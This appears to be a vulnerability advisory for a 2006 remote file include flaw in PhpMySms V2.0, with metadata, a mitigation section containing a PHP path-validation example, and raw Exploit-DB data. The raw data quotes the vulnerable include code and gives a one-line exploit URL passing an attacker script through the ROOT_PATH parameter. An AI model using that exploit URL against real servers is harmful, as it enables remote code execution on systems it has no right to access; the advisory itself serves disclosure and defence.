Vendor: PhpMySms
By: Persian-Defacer
CVSS: 9,3 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: PhpMySms
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:phpmysms:phpmysms:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability

A remote file include vulnerability exists in PhpMySms <= V2.0: sms_config/gateway.php builds the path of an included file from the ROOT_PATH request parameter without validating it. An attacker can exploit this to make the application include arbitrary files from remote locations, which can lead to execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
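
One way to apply this to the ROOT_PATH include in sms_config/gateway.php quoted in the raw advisory data (an added example, not PhpMySms code and not the vendor's patch; resolve_config() and the directory layout are assumptions). The include root is derived from the file's own location instead of a request-controlled variable, and the resolved path must stay inside that root:

```php
<?php
// Added example; resolve_config() and the directory layout are hypothetical.
/** Return the real path of $file under $root, or throw if it resolves elsewhere. */
function resolve_config(string $root, string $file = 'config.php'): string
{
    $base = realpath($root);             // false for URL-style values such as http://host/x
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('application root is not a local directory');
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $path   = realpath($prefix . $file); // collapses ../ segments and symlinks
    if ($path === false || !is_file($path) || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('config file is outside the application root');
    }
    return $path;
}

if (PHP_SAPI !== 'cli') {
    // Web request: the root comes from the file layout, never from ?ROOT_PATH=.
    // Assumption: gateway.php is in sms_config/ and config.php one level above it.
    $mode = $_POST['mode'] ?? $_GET['mode'] ?? null;   // quoted keys, explicit superglobals
    try {
        require resolve_config($mode === '1' ? __DIR__ : dirname(__DIR__));
    } catch (RuntimeException $e) {
        error_log('gateway.php: ' . $e->getMessage());
        http_response_code(500);
        exit;
    }
} else {
    // Command-line self-check with constructed inputs.
    $root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phpmysms_demo_' . getmypid();
    mkdir($root);
    file_put_contents("$root/config.php", "<?php // constructed sample config\n");
    $cases = [
        [$root, 'config.php'],                     // local file inside the root
        ['http://remote.invalid/x', 'config.php'], // constructed URL-style root
        [$root, '../config.php'],                  // traversal out of the root
    ];
    foreach ($cases as [$r, $f]) {
        try {
            $p = resolve_config($r, $f);
            echo "accepted: $p\n";
        } catch (RuntimeException $e) {
            echo "rejected ($r, $f): ", $e->getMessage(), "\n";
        }
    }
    unlink("$root/config.php");
    rmdir($root);
}
```

Setting allow_url_include = Off in php.ini additionally stops include and require from fetching URLs at the interpreter level.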

Exploit-DB raw data:

PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
www.Hacking-Boys.com
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

# milw0rm.com [2006-06-24]